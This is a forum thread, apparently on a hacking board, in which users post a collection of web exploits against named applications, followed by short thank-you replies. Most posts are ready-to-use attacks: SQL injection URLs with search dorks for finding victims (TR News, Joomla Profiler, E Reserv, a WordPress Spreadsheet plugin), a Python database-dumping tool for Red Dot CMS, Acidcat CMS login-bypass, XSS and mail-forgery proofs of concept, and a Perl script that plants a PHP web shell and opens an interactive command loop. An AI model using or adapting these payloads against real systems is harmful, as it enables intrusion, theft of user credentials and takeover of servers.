Announcement

Collapse
No announcement yet.

Collection of New Exploits ! Will Be Updated C

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Collection of New Exploits ! Will Be Updated C

    TR News 2.1 (nb) Remote SQL Injection Vulnerability


    ################################################## ######
    # #
    # Discovered by : His0k4 {Algerian HaCker} #
    # #
    # Email : His0k4.hlm[at]gmail[dot]com #
    # #
    # Greetz to: All Dz & muslims HaCkeRs :) #
    # #
    # Special Greetz:c02,Spym4n,THe-MooRiSH #
    # #
    ################################################## ######
    #
    # Script : Tr Script News v2.1
    #
    # Download script : http://www.easy-s...pt-21.zip

    #
    # Dork : inurl:news.php?mode=voir
    #
    # Vulnerable file : news.php
    #
    # P.O.C
    # http://www.victim.../[news_path]/news.php?mode=voir&nb=[SQL]
    #
    # Exemple:
    # http://www.victim.../[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
    #
    # Admin login: /admin
    #
    # Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php"
    #
    ################################################## ###########################
    :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek:

  • #2
    Re: Collection of New Exploits ! Will Be Updated C

    #!/usr/bin/env python

    # un-comment your selection.

    import urllib2
    import urllib
    import string
    import getopt
    import sys

    def banner():
    print
    print "RED DOT CMS 7.5 database enumeration"
    print "by Mark Crowther and Rodrigo Marcos"

    def usage():
    print
    print "usage():"
    print "python RD_POC.py [options] URL"
    print
    print " [options]"
    print " --dbenum: Database enumeration"
    print " --tableenum: Table enumeration, use -d to specify database"
    print " --colenum: Column enumeration, use -d to specify database and -t to specify table"
    print " --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column"
    print " -d: Specify a database"
    print " -t: Specify a table"
    print " -c: Specify a column"
    print " -h: Help page"
    print
    print "Examples: "
    print " python RD_POC.py --dbenum http://myhost/cms/"

    print " python RD_POC.py --tableenum -d IoAdministration http://myhost/cms/"

    print " python RD_POC.py --colenum -d IoAdministration -t IO_USR http://myhost/cms/"

    print " python RD_POC.py --dataenum -d IoAdministration -t IO_USR -c USR2 http://myhost/cms/"

    print
    sys.exit()

    def retrievedata(url1, url2 = "' ORDER BY 1;-- &DisableAutoLogin=1"):
    stop = 0

    current = ''

    while (stop==0):

    request = url1 + current + url2

    request = string.replace(request, ' ', '%20')
    req = urllib2.Request(request)
    try:
    r = urllib2.urlopen(req)
    except urllib2.URLError, msg:
    print "[+] Error: Error requesting URL (%s)" % msg
    result = r.read()

    #print result
    if string.find(result, ' Description Conversion failed when converting the ') == -1:
    stop = 1
    else:
    start = string.find(result, "'") + 1
    end = string.find(result[start:], "'") + start
    current = result[start:end]
    print current


    def dbenum():

    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '")

    def tableenum(database=''):

    if database=='':
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '")

    else:
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSOBJECTS where xtype=char(85) and name> '")

    def colenum(table, database=''):

    if table=='':
    usage()

    if database=='':
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '", "' AND id = (SELECT id from SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")
    else:
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSCOLUMNS where name > '","' AND id = (SELECT id from " + database + "..SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")


    def dataenum(column, table, database=''):

    if column=='' or table=='':
    usage()

    if database=='':
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + table + " WHERE " + column + "> '")

    else:
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + database + ".." + table + " WHERE " + column + "> '")


    banner()
    pdbenum = 0
    ptableenum = 0
    pcolenum = 0
    pdataenum = 0
    database = ''
    table = ''
    column = ''

    url = sys.argv[len(sys.argv)-1]

    try:
    opts, args = getopt.getopt(sys.argv[1:], "d:t:c:h:", ["help", "dbenum", "tableenum", "colenum", "dataenum"])
    except getopt.GetoptError:
    usage()

    try:
    for o, a in opts:
    if o in ("-h", "--help"):
    usage()
    if o == "--dbenum":
    pdbenum = 1
    if o == "--tableenum":
    ptableenum = 1
    if o == "--colenum":
    pcolenum = 1
    if o == "--dataenum":
    pdataenum = 1
    if o == "-d":
    database = a
    if o == "-t":
    table = a
    if o == "-c":
    column = a
    except:
    usage()


    if pdbenum == 1:
    print 'Enumerating databases:'
    dbenum()
    elif ptableenum == 1:
    print 'Enumerating tables:'
    tableenum(database)
    elif pcolenum == 1:
    print 'Enumerating columns:'
    colenum(table, database)
    elif pdataenum == 1:
    print 'Enumerating data:'
    dataenum(column, table, database)
    else:
    usage()
    -----------------------------------------------------------------
    DaRkLiFe is Watching 8-)

    Comment


    • #3
      Re: Collection of New Exploits ! Will Be Updated C

      ################################################## ################################
      # AmnPardaz Security Research Team
      #
      # Title: Acidcat CMS Multiple Vulnerabilities.
      # Vendor: http://www.acidcat.com
      # Vulnerable Version: 3.4.1
      # Exploit: Available
      # Impact: High
      # Fix: N/A
      ################################################## #################################


      ####################
      1. Description:
      ####################
      Acidcat CMS is a web site and simple Content Management System that can be administered via a web browser.

      ####################
      2. Vulnerability:
      ####################
      2.1. There is a SQL Injection in "default.asp". By using it, attacker can gain usernames and encrypted passwords.
      2.1.1. POC:
      Check the exploit section.
      2.2. There is a logical vulnerability in which attacker can send email by the site without any permission.
      2.2.1. POC:
      Check the exploit section.
      2.3. There is a SQL Injection in "main_login2.asp". By using it, attacker can login to the site.
      2.3.1. POC:
      Check the exploit section.
      2.4. There is a XSS in "/admin/admin_colors_swatch.asp".
      2.4.1. POC:
      /admin/admin_colors_swatch.asp?field=value='';}alert('XSS ');function(){myForm.myText
      2.5. There is a FckEditor which has no permission, and attacker can upload his/her file.
      2.5.1. POC:
      /admin/fckeditor/editor/filemanager/connectors/test.html
      ####################
      3. Exploits:
      ####################

      Original Exploit URL: http://bugreport....6/exploit


      3.1. Attacker can gain usernames and passwords:
      -------------
      <form action="http://[The URL]/default.asp?formType=&itemID=" method="post">
      <input type="text" name="cID" id="cID" value="-1 union select 1,username,3,password,5,6,7,8,9,10,'1-1-2000','1-1-2010' from ac_user" />


      <input type="submit" value="Submit" />
      </form>

      -------------
      3.2. Attacker can send email without any permission:
      -------------
      default_mail_aspemail.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!

      default_mail_cdosys.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!

      default_mail_jmail.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!
      -------------
      3.3. Attacker can login to the site:
      -------------
      <form action="main_login2.asp" method="post">
      <input type="hidden" name="username" id="username" value="FooNot' union select 1,2,3,'%CE%10%C9%CE%AC%0F%F3%07A%91%8B%1B%9FF%2D%D F%EBcO%9Au%5F%28%80%A5%0D%D0%89%EA%EF%3E%BB%BDx%5F %0EM%7C%09%2C%B6s%9D%EAa%2FqX%7E%08%05%CAZ%26%1ET% 10%CE' from ac_user where Username='1'or'1'='1'or'1'='1" size="200"/>


      <input type="hidden" name="password" id="password" value="0" />


      <input type="submit" value="Click To Login!" />

      Comment


      • #4
        Re: Collection of New Exploits ! Will Be Updated C

        ################################################## #######
        # #
        # Joomla Component Profiler Blind SQL Injection #
        # #
        ################################################## #######


        ########################################

        [~] ScriptName: "Joomla"
        [~] ModuleName: "Profiler"
        [~] Version: ?

        ########################################

        [~] DORK: allinurl:com_comprofiler

        ########################################

        [~] Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
        [~] Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

        ######################################## :arrow: :arrow: :arrow: :arrow: :arrow: :arrow:

        Comment


        • #5
          Re: Collection of New Exploits ! Will Be Updated C

          #!/usr/bin/perl
          #inphex
          #/siteadmin/spages.php
          # include("../include/config.php"Wink;
          # include("../include/function.php"Wink;
          #
          # if($_REQUEST['update'])
          # {
          # $file_path = $config['BASE_DIR']."/templates/".$_REQUEST['page'];
          # if(file_exists($file_path))
          # {
          # $handle = fopen($config['BASE_DIR']."/templates/".$_REQUEST['page'], "w"Wink;
          # fwrite($handle,stripslashes($_POST['body']));
          # fclose($handle);
          # $msg = "Page updated successfully";
          # }
          # else
          # $err = "Page does not exist";
          # }
          #
          # STemplate::assign('msg',$msg);
          # STemplate::assign('err',$err);
          # STemplate:Grinisplay("siteadmin/spages.tpl"Wink;
          #
          #Very easy one...
          #YouTube-Clone-Script is quite buggy,there are more bugs.

          use Digest::MD5 qw(md5 md5_hex md5_base64);
          use LWP::UserAgent;
          use HTTP::Cookies;
          use Switch;
          $host_ = shift;
          $path_ = shift;

          print "usage: $0 http://host /path/\n";
          $info{'info'} = {
          "author" => ["inphex"],
          "name" => ["YouTube Clone Script Remote Code Execution"],
          "version" => [],
          "description" => ["This Script will exploit a Remote Code Execution vulnerability existing in the YouTube Clone Script\n"],
          "options" =>
          {
          "agent" => "",
          "proxy" => "",
          "default_headers" => [
          ["key","value"]],
          "timeout" => 2,
          "cookie" =>
          {
          "cookie" => ["key=value"],
          },
          },
          "sending_options" =>
          {
          "host" => $host_,
          "path" => $path_."siteadmin/spages.php",
          "port" => 80,
          "method_a" => "REMOTE_CHECK",
          "attack" =>
          {
          "update" => ["get","update","1"],
          "path" => ["get","page","../about.php"],
          "content" => ["post","body","<?php echo system(\$_GET[cmd]); ?>"],
          },
          },

          };
          &start($info{'info'},222);
          do {
          print "\$";$cmd = <STDIN>;chomp($cmd);
          $info{'info'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => {"cookie" => ["key=value"],},},"sending_options" =>{"host" => $host_, "path" => $path_."about.php", "port" => 80, "method_a" => "CODE_EXECUTION", "attack" =>{"cmd" => ["get","cmd",$cmd], },},};
          &start($info{'info'},221);
          $content = ${$info{'info'}}{221}{'content'};
          print $content;
          print "\n";
          } while (1);
          sub start
          {
          $a_ = shift;
          @EXPORT = qw( start $return $a_ );
          $id = shift;
          $get_dA = get_d_p_s("get"Wink;
          $post_dA = get_d_p_s("post"Wink;
          my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
          my $jj = 1;
          my $ii = 48;
          my $hh = 1;
          my $ppp = 0;
          my $s = shift;
          my $a = "";
          my $res_p = "";
          my $h = "";
          ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xds jaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
          $ua = LWP::UserAgent->new;
          $ua->timeout($a_->{'options'}{'timeout'});
          if ($a_->{'options'}{'proxy'}) {
          $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
          }
          $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
          $ua->agent($agent);
          {
          while (($k,$v) = each(%{$a_}))
          {
          if ($k ne "options" && $k ne "sending_options"Wink
          {
          foreach $r (@{$a_->{$k}})
          {
          if ($a_->{$k}[0])
          {
          print $k.":".$a_->{$k}[0]."\n";
          }
          }
          }
          }


          foreach $j (@{$a_->{'options'}{'default_headers'}})
          {
          $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
          $m++;
          }

          if ($a_->{'options'}{'cookie'}{'cookie'}[0])
          {
          $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
          }



          }
          switch ($method_m)
          {
          case "attack" { &attack();}
          case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
          case "REMOTE_COMMAND_EXECUTION" { &attack();}
          case "REMOTE_CODE_EXECUTION" {&attack();}
          case "REMOTE_FILE_INCLUSION" { &attack();}
          case "LOCAL_FILE_INCLUSION" { &attack(); }
          else { &attack(); }

          }


          sub attack
          {

          if ($post_dA eq ""Wink {
          $method = "get";
          } elsif ($post_dA ne ""Wink
          {
          $method = "post";
          }
          if ($method eq "get"Wink {
          $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$ get_dA);
          ${$a_}{$id}{'content'} = $res_p;
          foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
          {
          $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

          while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
          {
          if (${$jj} ne ""Wink
          {
          ${$a_}{$id}{'regex'}[$h] = ${$jj};
          }
          $jj++;
          }
          $h++;
          }
          } elsif ($method eq "post"Wink
          {
          $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?". $get_dA,"application/x-www-form-urlencoded",$post_dA);

          ${$a_}{$id}{'content'} = $res_p;

          foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
          {
          $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
          while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
          {
          if (${$jj} ne ""Wink
          {
          ${$a_}{$id}{'regex'}[$h] = ${$jj};
          }
          $jj++;
          }
          $h++;
          }
          }

          }
          sub sql_injection_blind
          {
          while ()
          {
          while ($ii <= 90)
          {
          if(check($ii,$hh) == 1)
          {
          syswrite STDOUT,lc(chr($ii));
          $hh++;
          $chr = $chr.chr($ii);
          }
          $ii++;
          }
          push(@ffs,length($chr));
          if (($#ffs -1) == $ffs)
          {
          print "\nFinished/Error\n";
          exit;
          }
          $ii = 48;
          }
          }
          sub check($$)
          {
          $ii = shift;
          $hh = shift;
          if (get_d_p_s("post"Wink ne ""Wink
          {
          $method = "post";
          } else { $method = "get";}
          if ($method eq "get"Wink
          {
          $ppp++;
          $query = modify($get_dA,$ii,$hh);
          print $ii."-".$hh."\n";
          $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
          foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
          {
          if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
          {
          return 1;
          }
          else
          {
          return 0;
          }
          $h++;
          }
          } elsif ($method eq "post"Wink
          {
          $ppp++;
          $query_g = modify($get_dA,$ii,$hh);
          $query_p = modify($post_dA,$ii,$hh);

          $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"applica tion/x-www-form-urlencoded",$query_p);
          foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
          {
          if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
          {
          return 1;
          }
          else
          {
          return 0;
          }
          $h++;
          }
          }
          }
          sub modify($$$)
          {
          $string = shift;
          $replace_by = shift;
          $replace_by1 = shift;

          if ($string !~/\$i/ && $string !~/\$h/) {
          print $string;
          } elsif ($string !~/\$i/)
          {
          $ff = substr($string,0,index($string,"\$h"Wink);
          $ee = substr($string,rindex($string,"\$h"Wink+2);
          $string = $ff.$replace_by1.$ee;

          return $string;
          } elsif ($string !~/\$h/)
          {
          $f = substr($string,0,index($string,"\$i"Wink);
          $e = substr($string,rindex($string,"\$i"Wink+2);
          $string = $f.$replace_by.$e;
          return $string;
          } else
          {
          $f = substr($string,0,index($string,"\$i"Wink);
          $e = substr($string,rindex($string,"\$i"Wink+2);
          $string = $f.$replace_by.$e;

          $ff = substr($string,0,index($string,"\$h"Wink);
          $ee = substr($string,rindex($string,"\$h"Wink+2);
          $string = $ff.$replace_by1.$ee;

          return $string;
          }
          }
          sub get_d_p_s
          {
          $g_d_p_s = shift;
          $post_data = "";
          $get_data = "";
          $header_data = "";
          %header_dA = ();
          while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
          {
          if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get"Wink
          {

          $method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
          }
          elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post"Wink
          {
          $method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
          }
          elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header"Wink
          {
          $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
          }
          $hp++;
          }
          $yy = $#get;
          while ($bb <= $#get)
          {
          $get_data .= $get[$yy]."&";
          $bb++;
          $yy--;
          }
          $l = $#post;
          while ($k <= $#post)
          {

          $post_data .= $post[$l]."&";
          $k++;
          $l--;
          }
          if ($g_d_p_s eq "get"Wink
          {

          return $get_data;
          }
          elsif ($g_d_p_s eq "post"Wink
          {
          return $post_data;
          } elsif ($g_d_p_s eq "header"Wink
          {
          return %header_dA;
          }
          }
          sub get_data
          {
          $h_host_h_xdsjaop = shift;
          $h_path_h_xdsjaop = shift;
          %hash = get_d_p_s("header"Wink;
          while (($u,$c) = each(%hash))
          {
          $ua->default_headers->push_header($u => $c);
          }
          $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
          return $req->content;
          }
          sub post_data
          {
          $h_host_h_xdsjaop = shift;
          $h_path_h_xdsjaop = shift;
          $content_type = shift;
          $send = shift;
          %hash = get_d_p_s("header"Wink;
          while (($u,$c) = each(%hash))
          {
          $ua->default_headers->push_header($u => $c);
          }
          $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
          $req->content_type($content_type);
          $req->content($send);
          $res = $ua->request($req);
          return $res->content;
          }

          }

          Comment


          • #6
            Re: Collection of New Exploits ! Will Be Updated C

            ================================================== =======
            =============== JIKI TEAM [ Maroc And YameN ]===============
            ================================================== =======
            # Author : jiko
            # Script : E RESERV VERSION 2.1
            # Bug : Remote SQL Injection Vulnerability
            # Download : http://cogites.co...hp?num=21

            =========================JIkI Team===================
            # Exploit :
            http://[Site]/[script]/index.php?ID_loc=[sql]
            # Ex :
            http://[Site]/[script]/index.php?ID_loc=-1 union select version()--
            At Office Site
            http://cogites.co...%20version()--
            ================================================== =======
            greetz:
            all my friend and H-T Team and all No-back members and tryag.Com
            visit: http://www.no-back.org & http://www.tryag.com
            ================================================== =======

            Comment


            • #7
              Re: Collection of New Exploits ! Will Be Updated C

              ===========================================
              There's standart sql-injection in Spreadsheet <= 0.6 Plugin
              # Author : 1ten0.0net1
              # Script : Wordpress Plugin Spreadsheet <= 0.6 v.
              # Download : http://timrohrer....age_id=71

              # BUG : Remote SQL-Injection Vulnerability
              # Dork : inurl:/wp-content/plugins/wpSS/
              Example:
              http://site.com/w..._id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4+from+wp_users--&display=plain
              ===========================================
              Vulnerable code:
              ss_load.php
              $id = $_GET['ss_id'];
              ....
              ss_functions.php:
              function ss_load ($id, $plain=FALSE) {
              ....
              if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
              ....

              Comment


              • #8
                Re: Collection of New Exploits ! Will Be Updated C

                Damm dude awesome keep it up good job.

                Comment


                • #9
                  Re: Collection of New Exploits ! Will Be Updated C

                  Thanks for sharing

                  Comment


                  • #10
                    Re: Collection of New Exploits ! Will Be Updated C

                    cool, thanks mate

                    Comment


                    • #11
                      Re: Collection of New Exploits ! Will Be Updated C

                      thank bro thanks 4 mf links great post hope to see more

                      Comment


                      • #12
                        hmmmmm...interesting

                        Comment

                        Working...
                        X